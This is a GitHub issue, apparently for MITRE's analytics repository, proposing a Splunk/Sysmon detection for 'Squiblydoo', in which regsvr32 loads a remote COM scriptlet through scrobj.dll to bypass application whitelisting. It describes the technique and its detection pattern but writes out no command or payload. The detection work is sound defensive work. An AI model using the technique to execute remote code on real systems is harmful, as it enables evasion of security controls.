You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting. It can be seen by looking for regsvr32.exe executions that load the scrobj.dll (which execute the COM scriptlet) or, if that is too noisy, those that also load content directly via HTTP or HTTPS.
Squiblydoo was first written up by Casey Smith at Red Canary, though that blog post is no longer accessible.
This looks for any and all usage of the scrobj DLL, which is what is used to run COM scriptlets, so it'll detect both loading from network as well as filesystem. This will have almost zero false positives so is suitable for alerting.
Squiblydoo
Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting. It can be seen by looking for regsvr32.exe executions that load the scrobj.dll (which execute the COM scriptlet) or, if that is too noisy, those that also load content directly via HTTP or HTTPS.
Squiblydoo was first written up by Casey Smith at Red Canary, though that blog post is no longer accessible.
ATT&CK Coverage
Implementations
This looks for any and all usage of the scrobj DLL, which is what is used to run COM scriptlets, so it'll detect both loading from network as well as filesystem. This will have almost zero false positives so is suitable for alerting.
Language: Splunk
Data Model: Sysmon
Test Cases
The Atomic Red Team test for Squiblydoo is a good test case for this.
Data Model Mappings
References
As usual, credit to Roberto Rodriguez and the ThreatHunter Playbook.
Developer Certificate of Origin
DCO signed-off by: John Wunder jwunder@mitre.org
The text was updated successfully, but these errors were encountered: